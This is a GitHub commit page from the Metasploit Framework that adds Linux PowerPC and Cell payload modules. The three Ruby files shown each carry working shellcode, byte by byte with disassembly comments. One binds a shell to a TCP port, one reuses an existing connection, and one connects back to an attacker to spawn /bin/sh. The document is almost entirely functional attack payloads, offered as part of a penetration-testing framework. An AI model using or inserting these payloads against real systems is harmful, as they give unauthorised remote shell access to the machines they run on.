-
Notifications
You must be signed in to change notification settings - Fork 14k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added Linux Power/Cell Broadband Engine Architecture payload modules …
…and advanced payload options git-svn-id: file:///home/svn/framework3/trunk@5899 4d416f70-5f16-0410-b530-b9f4589650da
- Loading branch information
Ramon de C Valle
committed
Nov 13, 2008
1 parent
73b02f1
commit dfbf6b3
Showing
7 changed files
with
601 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,100 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/bind_tcp' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Bind TCP Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Listen for a connection and spawn a command shell', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::BindTcp, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'LPORT' => [ 58, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 # | ||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x7a\x1b\x78" +# mr r26,r3 # | ||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 # | ||
"\x3e\xe0\xff\x02" +# lis r23,-254 # | ||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) # | ||
"\x7c\x36\x0b\x78" +# mr r22,r1 # | ||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) # | ||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x75\x1b\x78" +# mr r21,r3 # | ||
"\x7f\x64\xdb\x78" +# mr r4,r27 # | ||
"\x7e\xa3\xab\x78" +# mr r3,r21 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,87 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/find_port' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Find Port Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Spawn a shell on an established connection', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::FindPort, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'CPORT' => [ 86, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x7c\x3c\x0b\x78" +# mr r28,r1 # | ||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x3a\x0b\x78" +# mr r26,r1 # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x3b\xff\x01\xff" +# addi r31,r31,511 # | ||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 # | ||
"\x38\x21\x01\xff" +# addi r1,r1,511 # | ||
"\x38\x21\xfe\x05" +# addi r1,r1,-507 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 # | ||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) # | ||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 # | ||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> # | ||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 # | ||
"\x7f\x04\xc3\x78" +# mr r4,r24 # | ||
"\x7f\xe3\xfb\x78" +# mr r3,r31 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/reverse_tcp' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Reverse TCP Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Connect back to attacker and spawn a command shell', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::ReverseTcp, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ], | ||
'LPORT' => [ 62, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 # | ||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x7a\x1b\x78" +# mr r26,r3 # | ||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 # | ||
"\x3e\xe0\x7f\x00" +# lis r23,32512 # | ||
"\x62\xf7\x00\x01" +# ori r23,r23,1 # | ||
"\x3a\xc0\x04\xd2" +# li r22,1234 # | ||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) # | ||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) # | ||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) # | ||
"\x7c\x35\x0b\x78" +# mr r21,r1 # | ||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) # | ||
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7f\x64\xdb\x78" +# mr r4,r27 # | ||
"\x7f\x43\xd3\x78" +# mr r3,r26 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
Oops, something went wrong.